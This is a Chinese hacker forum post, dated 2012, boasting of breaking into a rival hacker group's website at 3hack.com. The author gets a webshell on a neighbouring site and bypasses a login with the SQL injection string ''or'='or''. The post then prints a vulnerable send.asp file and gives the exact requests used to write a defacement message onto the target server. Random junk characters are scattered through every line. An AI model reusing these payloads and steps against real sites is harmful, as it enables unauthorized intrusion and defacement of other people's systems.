|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量4 |) p. L' F3 ]
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程) v3 ]+ j( g# J+ k+ ^
这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来) r R x* H; Q2 A0 n
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
$ m4 n6 a6 ? q, a首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
0 C* r3 Q1 P5 _ P, x6 e服务器应该防ARP,不过这还只是猜测
" f w& Z I/ g云中鸡说先不搞C段,PZ一下再说) O& q. m; l. Q, m1 S4 P. t2 F
然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]], p& U" u' d1 R" q9 r
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............5 |8 F' L7 m; w
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
+ u) Y' Z* H6 ]+ S! x& f0 M我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT# C9 x) c) l" Y" ^1 z# E' M Z
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
5 U9 z1 f" S% W U" ~看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
$ W9 h) W: K5 O+ z8 @! c问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局.............../ j% i5 m5 }: q/ y1 ~" H
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~& x+ |2 R" [, V: M7 H
然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么
1 e9 l- e4 S! O7 {: X打开一看,如图1所示。
4 D3 B4 e, E% W# y. C/ y/ ~7 `
0 z0 k1 g9 w3 w. i" o. s http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg; {& s! b. a! f/ b/ J
我靠~~这啥东西?这么帅?点进去一看,如图2所示。! i( B( L# V( \2 n3 M) \ }' I/ s
/ c& r2 A: n7 U' H
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
7 J# `. l& N6 c ^( R) E2 C太帅了,真YD!!3 E5 `- X/ O! Q& B9 M
这个页面应该是一套个人主页程序,而且还挺炫的!; p* e+ c. K) j
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
) m6 S1 D+ J) {3 _$ U
- @* M' L. s; G http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg0 r5 a7 z( [5 _4 B
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
6 d8 y% ? ~7 b' P. o$ c4 X2 L# o. M4 H T9 H) y
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg
- n* e' p- s. K& r; ^# A. A' N经过半个多小时的摸索,还是没有发现可利用的地方。
# Y4 F1 F2 U! @+ }0 ^ Q这下郁闷了,不管了,把这套程序下载下来看看吧
* t1 \ B) p" q$ t7 ?% y找了一会才知道这套程序叫做“V时代个人flash主页”
! n+ L' S' V$ H$ f到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用( R/ P5 T; G5 i: m$ {
于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]
# I& f$ R' R: \返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]: K" x9 g" y" y2 ?; v) L
同样是找不到页面,真晕!再看看!
7 \( ~0 P% s5 [. w$ p, p! e- q" c+ E5 j5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
3 t ~' R0 v+ Z) Z3 j马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!5 t! j) t3 J0 L% p9 C6 \7 B
打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了! G/ L4 |0 F' \. ]. C# F
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:% H; q- ^! q, q
, _2 W, H& T- i+ F. q: M0 I2 N
var a5 m5 k# G* S, M1 E6 J) d- c
var b ?1 }. n/ Q1 x, B
var tx) I7 e+ D# W0 [) J
var clean
& R- D. n0 i* [& k" M; ?/ p* ]3 la=Request("re")* Z( ?4 V. @ R/ c% k Z# D4 T
clean=Request("clean")7 _0 C- N4 @3 k/ a
var jian="test.txt"
% j1 s& r- c6 Y8 C) O/ K0 ] T2 U, n; b/ g7 U! r
if(clean==1){' T- n6 I9 h. f! I
tx="&a="4 `5 x% @; l6 S0 _3 x
var fs2
2 {/ `; @1 Q& [- n, n7 G A9 m+ Ivar fs2=Server.CreateObject("Scripting.FileSystemObject")
7 D9 N6 S6 e, y' _% K) Pvar newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
3 W* v9 R: Q0 {6 q( N2 [newdt.WriteLine("&a=")
7 l; p8 t* x' I. h$ b. |7 knewdt.close()
% G; j# E/ U2 |6 U. r0 n% [' ~2 N ]}( o1 w- K1 o6 { s6 N/ H% D
3 t, ~6 U! u pif(clean==0|clean==1){" I# v+ Z* p4 X8 F- E
tx=""% ^; D) o- Q6 }- o" u$ v
var fso = Server.Createobject("Scripting.FileSystemObject")
, M3 b5 M- o4 U8 _) Dvar file = fso.OpenTextFile(Server.Mappath(jian))
3 ]. j! g6 E2 n- M) b' \while (!file.AtEndOfStream){: H+ V4 Q6 A# |) G9 k* s& @5 I
tx=file.ReadLine()( r" h6 |) v- _) Z. p1 f! z+ Q
Response.write (tx)
7 X$ j! A2 j/ ^# _. V6 T' e}8 E p- z3 c$ Z; O2 K8 e3 b
Response.write ("&")7 L& T- g+ r6 {" k# L9 I3 i
file.close()+ X* g1 Q/ u. U7 k
}
& `$ V: m9 Z' U" m( L
; p' N# o" l- `if(clean==2){
) R4 v0 Y$ m! f' Jtx=""
/ A* ?% Q/ Z3 P0 @var fso = Server.Createobject("Scripting.FileSystemObject")
* ]! K, Z! s% Z" [! e Avar file = fso.OpenTextFile(Server.Mappath(jian))3 ~- V y+ Z1 j) D4 A) z
* Z; m9 ^/ `0 ?: Z8 }7 Lvar fs2
k7 H: I6 ]% f5 \* u- G6 l, dvar fs2=Server.CreateObject("Scripting.FileSystemObject")
2 ~, j+ b' x. `6 N7 J; b0 Lvar newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)- A2 l6 C& w" j2 B) f' T
K5 j; a" e3 e0 w2 Q' P& r G: }
while (!file.AtEndOfStream){9 ^! K- U8 y9 U# b' c# m6 L. K0 [
tx=file.ReadLine()7 _9 Y. {4 K5 q
Response.write (tx)}7 d- G) _4 C# ~6 ~' `$ e
- l4 O' m% m( E0 ~
Response.write (a+"&")+ u+ N+ |0 N0 _6 u
newdt.WriteLine(a); B5 `& s/ Z& ^0 D3 V; B
! |; _3 o9 y9 ?5 a# J2 z4 ?
file.close()
+ ]5 q( M! ]( }) S; Z: z6 cnewdt.close()
8 b( H/ K+ v- h( V5 k( P! w' F}
( Q+ H. h3 X; f1 C) ^1 X2 U N% n7 |" |7 w1 Q
, Y" H& z+ @9 ~) _& d复制代码: X% Q& D, H" Q7 J1 T5 D
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”& D* M' l2 m% D9 { x6 x
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”( r }1 S* t( F# j2 |" \. L: p
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话9 m+ h) m& h: D* Y$ t
过程如图5、6所示。
( b" Z- K( `; m1 S& P: j: F4 S% ^6 w' H' Y J
http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg
( M8 b7 A% I1 ?
" X3 h& T2 A5 G http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg
4 R; }6 B- b* {& }& N8 D; }. R( n& n提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。$ o" f& Y! V7 ?. W( B" B
}, U" u6 ?( c http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg P. _) P) l4 e2 Z6 c: O
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的4 J |( U8 s9 C/ M% s) a; `" ^
如果jian是经过request取值的话,同样也能搞到shell。' M0 k0 K7 ^* n& A7 c1 t! L( v
这次只是装到了X,并没有拿到shell
, j9 Q' e+ n- ?7 D r' \3 o- k/ I! m已经是凌晨了,跟云中J说了声就睡觉去鸟2 t1 I3 X1 g' _/ H
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙" R/ f- p( i ? k2 ^
就到这里吧,没技术含量,纯粹装X,高手们见笑了
1 h9 h. d+ i9 G, n- ]另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
3 P9 H3 [" A) Z9 x$ u. D自己学不到技术,却还在自欺欺人! j" o/ Z6 B8 I6 Q) c2 `, o
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
0 }; l# n* ^5 S1 A, {! C8 ^" @0 F3 B5 ^
|
|
发表于 2012-11-6 21:06:10
收藏
支持
反对